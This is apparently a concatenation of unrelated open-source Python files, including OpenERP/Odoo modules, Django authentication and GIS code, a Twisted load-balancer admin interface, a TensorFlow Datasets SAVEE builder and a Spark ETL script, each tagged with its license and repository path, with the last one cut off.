# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved # $Id$ # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import datetime import time from openerp.osv import osv from openerp.tools.translate import _ from openerp.report import report_sxw from openerp.tools.safe_eval import safe_eval as eval # # Use period and Journal for selection or resources # class report_assert_account(report_sxw.rml_parse): def __init__(self, cr, uid, name, context): super(report_assert_account, self).__init__(cr, uid, name, context=context) self.localcontext.update( { 'time': time, 'datetime': datetime, 'execute_code': self.execute_code, }) def execute_code(self, code_exec): def reconciled_inv(): """ returns the list of invoices that are set as reconciled = True """ return self.pool.get('account.invoice').search(self.cr, self.uid, [('reconciled','=',True)]) def order_columns(item, cols=None): """ This function is used to display a dictionary as a string, with its columns in the order chosen. :param item: dict :param cols: list of field names :returns: a list of tuples (fieldname: value) in a similar way that would dict.items() do except that the returned values are following the order given by cols :rtype: [(key, value)] """ if cols is None: cols = item.keys() return [(col, item.get(col)) for col in cols if col in item.keys()] localdict = { 'cr': self.cr, 'uid': self.uid, 'reconciled_inv': reconciled_inv, #specific function used in different tests 'result': None, #used to store the result of the test 'column_order': None, #used to choose the display order of columns (in case you are returning a list of dict) '_': _, #used for translation } eval(code_exec, localdict, mode="exec", nocopy=True) result = localdict['result'] column_order = localdict.get('column_order', None) if not isinstance(result, (tuple, list, set)): result = [result] if not result: result = [_('The test was passed successfully')] else: def _format(item): if isinstance(item, dict): return ', '.join(["%s: %s" % (tup[0], tup[1]) for tup in order_columns(item, column_order)]) else: return item result = [_(_format(rec)) for rec in result] return result class report_accounttest(osv.AbstractModel): _name = 'report.account_test.report_accounttest' _inherit = 'report.abstract_report' _template = 'account_test.report_accounttest' _wrapped_report_class = report_assert_account # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
ataylor32/django
django/contrib/auth/backends.py
468
6114
from __future__ import unicode_literals from django.contrib.auth import get_user_model from django.contrib.auth.models import Permission class ModelBackend(object): """ Authenticates against settings.AUTH_USER_MODEL. """ def authenticate(self, username=None, password=None, **kwargs): UserModel = get_user_model() if username is None: username = kwargs.get(UserModel.USERNAME_FIELD) try: user = UserModel._default_manager.get_by_natural_key(username) if user.check_password(password): return user except UserModel.DoesNotExist: # Run the default password hasher once to reduce the timing # difference between an existing and a non-existing user (#20760). UserModel().set_password(password) def _get_user_permissions(self, user_obj): return user_obj.user_permissions.all() def _get_group_permissions(self, user_obj): user_groups_field = get_user_model()._meta.get_field('groups') user_groups_query = 'group__%s' % user_groups_field.related_query_name() return Permission.objects.filter(**{user_groups_query: user_obj}) def _get_permissions(self, user_obj, obj, from_name): """ Returns the permissions of `user_obj` from `from_name`. `from_name` can be either "group" or "user" to return permissions from `_get_group_permissions` or `_get_user_permissions` respectively. """ if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() perm_cache_name = '_%s_perm_cache' % from_name if not hasattr(user_obj, perm_cache_name): if user_obj.is_superuser: perms = Permission.objects.all() else: perms = getattr(self, '_get_%s_permissions' % from_name)(user_obj) perms = perms.values_list('content_type__app_label', 'codename').order_by() setattr(user_obj, perm_cache_name, set("%s.%s" % (ct, name) for ct, name in perms)) return getattr(user_obj, perm_cache_name) def get_user_permissions(self, user_obj, obj=None): """ Returns a set of permission strings the user `user_obj` has from their `user_permissions`. """ return self._get_permissions(user_obj, obj, 'user') def get_group_permissions(self, user_obj, obj=None): """ Returns a set of permission strings the user `user_obj` has from the groups they belong. """ return self._get_permissions(user_obj, obj, 'group') def get_all_permissions(self, user_obj, obj=None): if not user_obj.is_active or user_obj.is_anonymous() or obj is not None: return set() if not hasattr(user_obj, '_perm_cache'): user_obj._perm_cache = self.get_user_permissions(user_obj) user_obj._perm_cache.update(self.get_group_permissions(user_obj)) return user_obj._perm_cache def has_perm(self, user_obj, perm, obj=None): if not user_obj.is_active: return False return perm in self.get_all_permissions(user_obj, obj) def has_module_perms(self, user_obj, app_label): """ Returns True if user_obj has any permissions in the given app_label. """ if not user_obj.is_active: return False for perm in self.get_all_permissions(user_obj): if perm[:perm.index('.')] == app_label: return True return False def get_user(self, user_id): UserModel = get_user_model() try: return UserModel._default_manager.get(pk=user_id) except UserModel.DoesNotExist: return None class RemoteUserBackend(ModelBackend): """ This backend is to be used in conjunction with the ``RemoteUserMiddleware`` found in the middleware module of this package, and is used when the server is handling authentication outside of Django. By default, the ``authenticate`` method creates ``User`` objects for usernames that don't already exist in the database. Subclasses can disable this behavior by setting the ``create_unknown_user`` attribute to ``False``. """ # Create a User object if not already in the database? create_unknown_user = True def authenticate(self, remote_user): """ The username passed as ``remote_user`` is considered trusted. This method simply returns the ``User`` object with the given username, creating a new ``User`` object if ``create_unknown_user`` is ``True``. Returns None if ``create_unknown_user`` is ``False`` and a ``User`` object with the given username is not found in the database. """ if not remote_user: return user = None username = self.clean_username(remote_user) UserModel = get_user_model() # Note that this could be accomplished in one try-except clause, but # instead we use get_or_create when creating unknown users since it has # built-in safeguards for multiple threads. if self.create_unknown_user: user, created = UserModel._default_manager.get_or_create(**{ UserModel.USERNAME_FIELD: username }) if created: user = self.configure_user(user) else: try: user = UserModel._default_manager.get_by_natural_key(username) except UserModel.DoesNotExist: pass return user def clean_username(self, username): """ Performs any cleaning on the "username" prior to using it to get or create the user object. Returns the cleaned username. By default, returns the username unchanged. """ return username def configure_user(self, user): """ Configures a user after creation and returns the updated user. By default, returns the user unmodified. """ return user
bsd-3-clause
CuonDeveloper/cuon
cuon_server/LoadBalancer/build/lib/txlb/admin/pages.py
6
13370
import time import urllib import socket from xml.dom import minidom from twisted.web import http from twisted.web import static from twisted.web import resource import txlb from txlb import util from txlb.admin import css from txlb.admin import template class UnauthorizedResource(resource.Resource): """ The page resource to present when a restricted resource is requested, thus prompting the user with a basic auth dialog. """ isLeaf = 1 unauthorizedPage = static.Data(template.unauth, 'text/html') def render(self, request): request.setResponseCode(http.UNAUTHORIZED) request.setHeader( 'WWW-authenticate', 'basic realm="PyDirector"') return self.unauthorizedPage.render(request) class StyleSheet(resource.Resource): """ The resource that serves the CSS. """ def render_GET(self, request): """ """ return css.adminCSS class BasePage(resource.Resource): """ All resources that render the basic look and feel of the admin UI subclass this page class. """ def __init__(self, parent): resource.Resource.__init__(self) self.parent = parent def getHeader(self, refreshURL='', msg=''): """ """ refresh = '' if refreshURL: refresh = template.refresh % ( self.parent.conf.admin.refresh, refreshURL) if msg: msg = template.message % msg return template.header % ( txlb.name, refresh, txlb.name, self.parent.serverVersion, socket.gethostname()) + msg def getBody(self): """ Subclasses must override this. """ raise NotImplemented def getFooter(self, message=''): """ """ if message: message = template.message % urllib.unquote(message) return template.footer % (txlb.projectURL, txlb.name, message) def getPage(self, request): """ Subclasses must override this. """ raise NotImplemented def render_GET(self, request): """ """ return str(self.getPage(request)) def isReadOnly(self): """ This check needs to be run before any form submission is processed. """ if self.parent.director.isReadOnly: msg = "The load balancer is currently in read-only mode." request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return True return False class RunningPage(BasePage): """ This class is responsible for presenting the admin UI, in all of it's data and button-pushing glory. """ def getPage(self, request): """ Don't look at me; this craziness is a modified version of the original. """ verbose = False resultMessage = '' content = '' msg = '' if request.args.has_key('resultMessage'): msg = request.args['resultMessage'][0] if request.args.has_key('refresh'): refresh = bool(request.args['refresh'][0]) url = '/all?refresh=1&ignore=%s' % time.time() content += self.getHeader(refreshURL=url, msg=msg) stopStart = template.stopRefresh % time.time() else: content += self.getHeader(msg=msg) stopStart = template.startRefresh % time.time() content += template.refreshButtons % ( time.ctime(time.time()), time.time(), stopStart) for service in self.parent.conf.getServices(): content += template.serviceName % service.name for index, l in enumerate(service.listen): proxy = self.parent.director.getProxy(service.name, index) hostPort = "%s:%s" % (proxy.host, proxy.port) content += template.listeningService % hostPort eg = service.getEnabledGroup() groups = service.getGroups() for group in groups: tracker = self.parent.director.getTracker( service.name, group.name) stats = tracker.getStats() hdict = tracker.getHostNames() if group is eg: klass = 'enabled' desc = template.groupDescEnabled else: klass = 'inactive' desc = template.groupDescDisabled % ( service.name, group.name) content += template.groupName % (klass, group.name) content += desc content += template.groupHeaderForm % ( service.name, group.name, klass) counts = stats['openconns'] failed = stats['failed'] totals = stats['totals'] k = counts.keys() k.sort() for h in k: f = 0 if failed.has_key(h): f = failed[h] if counts.has_key(h): oc = counts[h] else: oc = '--' if totals.has_key(h): tc = totals[h] else: tc = '--' content += template.hostInfo % ( klass, hdict[h], h, oc, tc, f, urllib.quote(service.name), urllib.quote(group.name), urllib.quote(h)) bad = stats['bad'] if bad: content += template.badHostGroup % klass for k in bad.keys(): host = '%s:%s' % k when, what = bad[k] content += template.badHostInfo % ( klass, hdict[host], host, what.getErrorMessage()) content += template.serviceClose content += self.getFooter(resultMessage) return content class RunningConfig(BasePage): """ This class renders the in-memory configuration as XML. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/plain') return util.reprNestedObjects(self.parent.conf) class StoredConfig(BasePage): """ This page renders the on-disk XML configuration file. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/plain') return self.parent.conf.dom.toxml() class DeleteHost(BasePage): """ This page is responsible for removing a host from rotation in the admin UI. It also updates the tracker and pulls the host out of rotation there as well. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/html') if self.isReadOnly(): return "OK" service = request.args['service'][0] group = request.args['group'][0] ip = request.args['ip'][0] tracker = self.parent.director.getTracker( serviceName=service, groupName=group) service = self.parent.conf.getService(service) eg = service.getEnabledGroup() if group == eg.name: if tracker.delHost(ip=ip, activegroup=1): msg = 'host %s deleted (from active group!)' % ip else: msg = 'host %s <b>not</b> deleted from active group' % ip else: if tracker.delHost(ip=ip): msg = 'host %s deleted from inactive group' % ip else: msg = 'host %s <b>not</b> deleted from inactive group' % ip request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return "OK" class AddHost(BasePage): """ This page class is responsible for handling the "add page" action that puts new hosts into rotation, both in the admin UI as well as in the host tracking object. """ def getPage(self, request): request.setHeader('Content-type', 'text/html') if self.isReadOnly(): return "OK" serviceName = request.args['service'][0] groupName = request.args['group'][0] name = request.args['name'][0] ip = request.args['ip'][0] self.parent.editor.addHost(serviceName, groupName, name, ip) msg = 'Host %s(%s) added to %s / %s' % ( name, ip, groupName, serviceName) request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return "OK" class EnableGroup(BasePage): """ This page is responsible for enabling a different host group for a given service in the web UI. """ def getPage(self, request): """ """ request.setHeader('Content-type', 'text/html') if self.isReadOnly(): return "OK" serviceName = request.args['service'][0] newGroupName = request.args['group'][0] service = self.parent.director.getService(serviceName) oldGroupName = service.getEnabledGroup().name self.parent.editor.switchGroup(serviceName, oldGroupName, newGroupName) msg = "Group '%s' has been enabled." % newGroupName request.redirect('/all?resultMessage=%s' % urllib.quote(msg)) return "OK" def protect(method): """ A decorator for use by Editor methods that need to support atomic-ish operations. """ def decorator(self, *args, **kwds): self.begin() result = method(self, *args, **kwds) self.finish() return result return decorator class Editor(object): """ An object whose sole purpose is to collect all methods that change data into a single class. This is done in an effort to improve maintainability of data-changing code and to provide a unified, chohesive process whereby data edits are performed. """ def __init__(self, conf, director): self.conf = conf self.director = director def begin(self): self.director.setReadOnly() print "Set to read-only mode." def finish(self): self.director.setReadWrite() print "Set to read-write mode." def addHost(self, serviceName, groupName, name, ip, weight=1): """ This method adds a host to the tracker and model (director call) as well as the configuration data. """ self.director.addHost(serviceName, groupName, name, ip, weight) group = self.conf.getService(serviceName).getGroup(groupName) group.addHost(name, ip, weight) addHost = protect(addHost) def delHost(self, serviceName, groupName, name, ip): """ This method removes a host from the tracker and model (director call) as well as the configuration data. """ self.director.delHost(serviceName, groupName, name, ip) group = self.conf.getService(serviceName).getGroup(groupName) group.delHost(name) delHost = protect(delHost) def switchGroup(self, serviceName, oldGroupName, newGroupName): """ This method changes the current/active group for a given service. """ # update the configuration info serviceConf = self.conf.getService(serviceName) serviceConf.setEnabledGroup(newGroupName) # update the tracker and model info self.director.switchGroup(serviceName, oldGroupName, newGroupName) switchGroup = protect(switchGroup) class AdminServer(resource.Resource): """ The admin server page is the root web object that publishes all the other resources. """ def __init__(self, conf, director): resource.Resource.__init__(self) self.conf = conf self.director = director self.editor = Editor(conf, director) self.starttime = time.time() self.serverVersion = "%s/%s" % (txlb.shortName, txlb.version) def unauthorized(self): return UnauthorizedResource() def authenticateUser(self, request): # XXX this needs to be replaced with a guard/cred authstr = request.getHeader('Authorization') if not authstr: return False type, auth = authstr.split() if type.lower() != 'basic': return False auth = auth.decode('base64') user, pw = auth.split(':',1) userObj = self.conf.admin.getUser(user) if (userObj and userObj.checkPW(pw)): return True return False def getChild(self, name, request): """ A simple object publisher that mapes part of a URL path to an object. """ if not self.authenticateUser(request): return self.unauthorized() if name == 'all' or name == '': page = RunningPage(self) return page elif name == 'txlb.css': return StyleSheet() elif name == 'config.obj': return RunningConfig(self) elif name == 'config.xml': return StoredConfig(self) elif name == 'delHost': return DeleteHost(self) elif name == 'addHost': return AddHost(self) elif name == 'enableGroup': return EnableGroup(self) return resource.Resource.getChild(self, name, request)
gpl-3.0
tensorflow/datasets
tensorflow_datasets/audio/savee.py
1
7125
# coding=utf-8 # Copyright 2021 The TensorFlow Datasets Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """SAVEE dataset.""" import collections import os import re import numpy as np import tensorflow.compat.v2 as tf import tensorflow_datasets.public_api as tfds LABEL_MAP = { 'a': 'anger', 'd': 'disgust', 'f': 'fear', 'h': 'happiness', 'n': 'neutral', 'sa': 'sadness', 'su': 'surprise', } SPEAKERS = ['DC', 'JE', 'JK', 'KL'] _CITATION = """ @inproceedings{Vlasenko_combiningframe, author = {Vlasenko, Bogdan and Schuller, Bjorn and Wendemuth, Andreas and Rigoll, Gerhard}, year = {2007}, month = {01}, pages = {2249-2252}, title = {Combining frame and turn-level information for robust recognition of emotions within speech}, journal = {Proceedings of Interspeech} } """ _DESCRIPTION = """ SAVEE (Surrey Audio-Visual Expressed Emotion) is an emotion recognition dataset. It consists of recordings from 4 male actors in 7 different emotions, 480 British English utterances in total. The sentences were chosen from the standard TIMIT corpus and phonetically-balanced for each emotion. This release contains only the audio stream from the original audio-visual recording. The data is split so that the training set consists of 2 speakers, and both the validation and test set consists of samples from 1 speaker, respectively. """ def _compute_split_boundaries(split_probs, n_items): """Computes boundary indices for each of the splits in split_probs. Args: split_probs: List of (split_name, prob), e.g. [('train', 0.6), ('dev', 0.2), ('test', 0.2)] n_items: Number of items we want to split. Returns: The item indices of boundaries between different splits. For the above example and n_items=100, these will be [('train', 0, 60), ('dev', 60, 80), ('test', 80, 100)]. """ if len(split_probs) > n_items: raise ValueError('Not enough items for the splits. There are {splits} ' 'splits while there are only {items} items'.format( splits=len(split_probs), items=n_items)) total_probs = sum(p for name, p in split_probs) if abs(1 - total_probs) > 1E-8: raise ValueError('Probs should sum up to 1. probs={}'.format(split_probs)) split_boundaries = [] sum_p = 0.0 for name, p in split_probs: prev = sum_p sum_p += p split_boundaries.append((name, int(prev * n_items), int(sum_p * n_items))) # Guard against rounding errors. split_boundaries[-1] = (split_boundaries[-1][0], split_boundaries[-1][1], n_items) return split_boundaries def _get_inter_splits_by_group(items_and_groups, split_probs, split_number): """Split items to train/dev/test, so all items in group go into same split. Each group contains all the samples from the same speaker ID. The samples are splitted so that all each speaker belongs to exactly one split. Args: items_and_groups: Sequence of (item_id, group_id) pairs. split_probs: List of (split_name, prob), e.g. [('train', 0.6), ('dev', 0.2), ('test', 0.2)] split_number: Generated splits should change with split_number. Returns: Dictionary that looks like {split name -> set(ids)}. """ groups = sorted(set(group_id for item_id, group_id in items_and_groups)) rng = np.random.RandomState(split_number) rng.shuffle(groups) split_boundaries = _compute_split_boundaries(split_probs, len(groups)) group_id_to_split = {} for split_name, i_start, i_end in split_boundaries: for i in range(i_start, i_end): group_id_to_split[groups[i]] = split_name split_to_ids = collections.defaultdict(set) for item_id, group_id in items_and_groups: split = group_id_to_split[group_id] split_to_ids[split].add(item_id) return split_to_ids class Savee(tfds.core.GeneratorBasedBuilder): """The audio part of SAVEE dataset for emotion recognition.""" VERSION = tfds.core.Version('1.0.0') MANUAL_DOWNLOAD_INSTRUCTIONS = """\ manual_dir should contain the file AudioData.zip. This file should be under Data/Zip/AudioData.zip in the dataset folder provided upon registration. You need to register at http://personal.ee.surrey.ac.uk/Personal/P.Jackson/SAVEE/Register.html in order to get the link to download the dataset. """ def _info(self): return tfds.core.DatasetInfo( builder=self, description=_DESCRIPTION, features=tfds.features.FeaturesDict({ 'audio': tfds.features.Audio(file_format='wav', sample_rate=44100), 'label': tfds.features.ClassLabel(names=list(LABEL_MAP.values())), 'speaker_id': tf.string }), supervised_keys=('audio', 'label'), homepage='http://kahlan.eps.surrey.ac.uk/savee/', citation=_CITATION, ) def _split_generators(self, dl_manager): """Returns SplitGenerators.""" zip_path = os.path.join(dl_manager.manual_dir, 'AudioData.zip') if not tf.io.gfile.exists(zip_path): raise AssertionError( 'SAVEE requires manual download of the data. Please download ' 'the audio data and place it into: {}'.format(zip_path)) # Need to extract instead of reading directly from archive since reading # audio files from zip archive is not supported. extract_path = dl_manager.extract(zip_path) items_and_groups = [] for fname in tf.io.gfile.glob('{}/AudioData/*/*.wav'.format(extract_path)): folder, _ = os.path.split(fname) _, speaker_id = os.path.split(folder) items_and_groups.append((fname, speaker_id)) split_probs = [('train', 0.6), ('validation', 0.2), ('test', 0.2)] splits = _get_inter_splits_by_group(items_and_groups, split_probs, 0) return [ tfds.core.SplitGenerator( name=tfds.Split.TRAIN, gen_kwargs={'file_names': splits['train']}, ), tfds.core.SplitGenerator( name=tfds.Split.VALIDATION, gen_kwargs={'file_names': splits['validation']}, ), tfds.core.SplitGenerator( name=tfds.Split.TEST, gen_kwargs={'file_names': splits['test']}, ), ] def _generate_examples(self, file_names): """Yields examples.""" for fname in file_names: folder, wavname = os.path.split(fname) _, speaker_id = os.path.split(folder) label_abbrev = re.match('^([a-zA-Z]+)', wavname).group(1) # pytype: disable=attribute-error label = LABEL_MAP[label_abbrev] key = '{}_{}'.format(speaker_id, wavname.split('.')[0]) yield key, {'audio': fname, 'label': label, 'speaker_id': speaker_id}
apache-2.0
cysuncn/python
spark/crm/PROC_F_CI_SUN_IND_INFO_TMP.py
1
6787
#coding=UTF-8 from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext from pyspark.sql.types import * from datetime import date, datetime, timedelta import sys, re, os st = datetime.now() conf = SparkConf().setAppName('PROC_F_CI_SUN_IND_INFO_TMP').setMaster(sys.argv[2]) sc = SparkContext(conf = conf) sc.setLogLevel('WARN') if len(sys.argv) > 5: if sys.argv[5] == "hive": sqlContext = HiveContext(sc) else: sqlContext = SQLContext(sc) hdfs = sys.argv[3] dbname = sys.argv[4] #处理需要使用的日期 etl_date = sys.argv[1] #etl日期 V_DT = etl_date #上一日日期 V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime("%Y%m%d") #月初日期 V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime("%Y%m%d") #上月末日期 V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime("%Y%m%d") #10位日期 V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime("%Y-%m-%d") V_STEP = 0 F_CI_SUN_IND_INFO = sqlContext.read.parquet(hdfs+'/F_CI_SUN_IND_INFO/*') F_CI_SUN_IND_INFO.registerTempTable("F_CI_SUN_IND_INFO") #任务[21] 001-01:: V_STEP = V_STEP + 1 sql = """ SELECT CAST(F.CUSTOMERID AS VARCHAR(32)) AS CUSTOMERID, CAST(F.FULLNAME AS VARCHAR(32)) AS FULLNAME, CAST(F.CERTTYPE AS VARCHAR(10)) AS CERTTYPE, CAST(F.CERTID AS VARCHAR(18)) AS CERTID, CAST('' AS VARCHAR(4)) AS SEX, CAST('' AS VARCHAR(10)) AS BIRTHDAY, CAST(F.NATIVEPLACE AS VARCHAR(200)) AS NATIVEPLACE, CAST('' AS VARCHAR(4)) AS MYBANKDORM, CAST('' AS VARCHAR(4)) AS STAFF, CAST('' AS VARCHAR(4)) AS ISREALTIVEMAN, CAST('' AS VARCHAR(18)) AS NATIONALITY, CAST('' AS VARCHAR(18)) AS POLITICALFACE, CAST('' AS VARCHAR(18)) AS MARRIAGE, CAST('' AS VARCHAR(4)) AS HEALTH, CAST('' AS VARCHAR(18)) AS EDUEXPERIENCE, CAST('' AS VARCHAR(18)) AS EDUDEGREE, CAST('' AS VARCHAR(80)) AS WORKCORP, CAST('' AS VARCHAR(18)) AS HEADSHIP, CAST('' AS VARCHAR(18)) AS POSITION, CAST('' AS DECIMAL(10)) AS FAMILYAMOUNT, CAST('' AS VARCHAR(200)) AS TEAMNAME, CAST('' AS VARCHAR(250)) AS REMARK2, CAST('' AS VARCHAR(250)) AS REMARK3, CAST('' AS VARCHAR(18)) AS CREDITFARMER, CAST('' AS VARCHAR(250)) AS REMARK4, CAST('' AS VARCHAR(18)) AS FAMILYSTATUS, CAST(F.FAMILYADD AS VARCHAR(200)) AS FAMILYADD, CAST('' AS VARCHAR(32)) AS FAMILYZIP, CAST('' AS VARCHAR(40)) AS FAMILYTEL, CAST('' AS VARCHAR(32)) AS MOBILETELEPHONE, CAST('' AS VARCHAR(80)) AS EMAILADD, CAST('' AS VARCHAR(18)) AS OCCUPATION, CAST('' AS VARCHAR(4)) AS DELAYCREDIT, CAST('' AS VARCHAR(18)) AS DELAYCREDITREASON, CAST('' AS VARCHAR(50)) AS FARMERCARD, CAST('' AS VARCHAR(32)) AS MYBALANCEACCOUNT, CAST('' AS VARCHAR(40)) AS MARKUP, CAST('' AS DECIMAL(10)) AS FAMILYMONTHINCOME, CAST('' AS VARCHAR(200)) AS MAINPROORINCOME, CAST('' AS VARCHAR(18)) AS CREDITLEVEL, CAST('' AS VARCHAR(10)) AS EVALUATEDATE, CAST(F.REMARK AS VARCHAR(250)) AS REMARK, CAST('' AS VARCHAR(10)) AS INPUTUSERID, CAST('' AS VARCHAR(12)) AS INPUTORGID, CAST('' AS VARCHAR(10)) AS INPUTDATE, CAST('' AS VARCHAR(10)) AS UPDATEDATE, CAST('' AS VARCHAR(10)) AS UPDATEUSERID, CAST('' AS VARCHAR(12)) AS UPDATEORGID, CAST(F.FARMILYID AS VARCHAR(20)) AS FARMILYID, CAST('' AS VARCHAR(4)) AS FAMILYROLE, CAST('' AS VARCHAR(4)) AS ISHZ, CAST('' AS DECIMAL(24,6)) AS WORKINGCAPITAL, CAST('' AS DECIMAL(24,6)) AS CAPITALASSETS, CAST('' AS DECIMAL(24,6)) AS FAMILYAVERAGEINCOME, CAST('' AS DECIMAL(24,6)) AS FAMILYALLINCOME, CAST('' AS DECIMAL(24,6)) AS FAMILYALLOUT, CAST('' AS DECIMAL(24,6)) AS FAMILYPUREINCOME, CAST('' AS DECIMAL(24,6)) AS TOTALASSETS, CAST('' AS DECIMAL(24,7)) AS TOTALINDEBTEDNESS, CAST('' AS DECIMAL(24,6)) AS FAMILYPUREASSET, CAST('' AS DECIMAL(24,6)) AS LANDSIZE, CAST('' AS VARCHAR(80)) AS LANDNO, CAST('' AS DECIMAL(24,8)) AS YEAROUTCOME, CAST('' AS VARCHAR(80)) AS BUSINESSADDRESS, CAST('' AS VARCHAR(81)) AS ALLGUARANTYADDRESS, CAST('' AS VARCHAR(20)) AS ALLGUARANTYTEL, CAST('' AS VARCHAR(10)) AS CREDITDATE, CAST('' AS INTEGER) AS INFRINGEMENTTIMES, CAST('' AS DECIMAL(24,6)) AS AVERAGEDEPOSIT, CAST('' AS VARCHAR(20)) AS PROJECTNO, CAST('' AS DECIMAL(24,6)) AS MAINPROSCOPE, CAST('' AS VARCHAR(10)) AS MANAGEUSERID, CAST('' AS VARCHAR(12)) AS MANAGEORGID, CAST('' AS DECIMAL(24,6)) AS ORDERDEPOSIT, CAST('' AS VARCHAR(4)) AS MHOUSESTRUCTURE, CAST('' AS INTEGER) AS MHOUSENO, CAST('' AS DECIMAL(24,6)) AS ACTUALEVALUATE, CAST('' AS VARCHAR(4)) AS OHOUSESTRUCTURE, CAST('' AS INTEGER) AS OHOUSENO, CAST('' AS DECIMAL(24,6)) AS OACTUALEVALUATE, CAST('' AS VARCHAR(40)) AS MACHINENAME, CAST('' AS DECIMAL(24,6)) AS MACHINEVALUE, CAST('' AS DECIMAL(24,6)) AS OTHERASSET, CAST('' AS VARCHAR(80)) AS HOUSEAREANAME, CAST('' AS VARCHAR(40)) AS HOUSEID, CAST(F.HOUSEAREANO AS DECIMAL(24,6)) AS HOUSEAREANO, CAST('' AS VARCHAR(20)) AS CUSTOMERTYPE, CAST('' AS DECIMAL(24,6)) AS YEARLNCOME, CAST(F.FR_ID AS VARCHAR(32)) AS CORPORATEORGID, CAST('' AS VARCHAR(18)) AS TEMPSAVEFLAG, CAST('' AS VARCHAR(32)) AS TEAMNO, CAST(F.VILLAGENO AS VARCHAR(32)) AS VILLAGENO, CAST('' AS VARCHAR(2)) AS LOCKORNOT, CAST('' AS VARCHAR(2)) AS ISUSINGCREDIT, CAST('' AS VARCHAR(32)) AS XDCUSTOMERID, CAST(V_DT AS VARCHAR(10)) AS ODS_ST_DATE, CAST('' AS VARCHAR(5)) AS ODS_SYS_ID FROM F_CI_SUN_IND_INFO F JOIN (SELECT MAX(CUSTOMERID) CUSTOMERID,FR_ID FROM F_CI_SUN_IND_INFO GROUP BY CERTTYPE,CERTID,FULLNAME,FR_ID ) C ON C.CUSTOMERID=F.CUSTOMERID AND C.FR_ID = F.FR_ID """ sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql) F_CI_SUN_IND_INFO_TMP = sqlContext.sql(sql) F_CI_SUN_IND_INFO_TMP.registerTempTable("F_CI_SUN_IND_INFO_TMP") dfn="F_CI_SUN_IND_INFO_TMP/"+V_DT+".parquet" F_CI_SUN_IND_INFO_TMP.cache() nrows = F_CI_SUN_IND_INFO_TMP.count() F_CI_SUN_IND_INFO_TMP.write.save(path=hdfs + '/' + dfn, mode='overwrite') F_CI_SUN_IND_INFO_TMP.unpersist() ret = os.system("hdfs dfs -rm -r /"+dbname+"/F_CI_SUN_IND_INFO_TMP/"+V_DT_LD+".parquet") et = datetime.now() print("Step %d start[%s] end[%s] use %d seconds, insert F_CI_SUN_IND_INFO_TMP lines %d") % (V_STEP, st.strftime("%H:%M:%S"), et.strftime("%H:%M:%S"), (et-st).seconds, nrows)
gpl-3.0
zzzombat/lucid-python-django
django/contrib/gis/management/commands/inspectdb.py
311
1553
from optparse import make_option from django.core.management.base import CommandError from django.core.management.commands.inspectdb import Command as InspectDBCommand class Command(InspectDBCommand): db_module = 'django.contrib.gis.db' gis_tables = {} def get_field_type(self, connection, table_name, row): field_type, field_params, field_notes = super(Command, self).get_field_type(connection, table_name, row) if field_type == 'GeometryField': geo_col = row[0] # Getting a more specific field type and any additional parameters # from the `get_geometry_type` routine for the spatial backend. field_type, geo_params = connection.introspection.get_geometry_type(table_name, geo_col) field_params.update(geo_params) # Adding the table name and column to the `gis_tables` dictionary, this # allows us to track which tables need a GeoManager. if table_name in self.gis_tables: self.gis_tables[table_name].append(geo_col) else: self.gis_tables[table_name] = [geo_col] return field_type, field_params, field_notes def get_meta(self, table_name): meta_lines = super(Command, self).get_meta(table_name) if table_name in self.gis_tables: # If the table is a geographic one, then we need make # GeoManager the default manager for the model. meta_lines.insert(0, ' objects = models.GeoManager()') return meta_lines
bsd-3-clause
shingonoide/odoo
addons/bus/bus.py
325
7324
# -*- coding: utf-8 -*- import datetime import json import logging import select import threading import time import random import simplejson import openerp from openerp.osv import osv, fields from openerp.http import request from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT _logger = logging.getLogger(__name__) TIMEOUT = 50 #---------------------------------------------------------- # Bus #---------------------------------------------------------- def json_dump(v): return simplejson.dumps(v, separators=(',', ':')) def hashable(key): if isinstance(key, list): key = tuple(key) return key class ImBus(osv.Model): _name = 'bus.bus' _columns = { 'id' : fields.integer('Id'), 'create_date' : fields.datetime('Create date'), 'channel' : fields.char('Channel'), 'message' : fields.char('Message'), } def gc(self, cr, uid): timeout_ago = datetime.datetime.utcnow()-datetime.timedelta(seconds=TIMEOUT*2) domain = [('create_date', '<', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))] ids = self.search(cr, openerp.SUPERUSER_ID, domain) self.unlink(cr, openerp.SUPERUSER_ID, ids) def sendmany(self, cr, uid, notifications): channels = set() for channel, message in notifications: channels.add(channel) values = { "channel" : json_dump(channel), "message" : json_dump(message) } self.pool['bus.bus'].create(cr, openerp.SUPERUSER_ID, values) cr.commit() if random.random() < 0.01: self.gc(cr, uid) if channels: with openerp.sql_db.db_connect('postgres').cursor() as cr2: cr2.execute("notify imbus, %s", 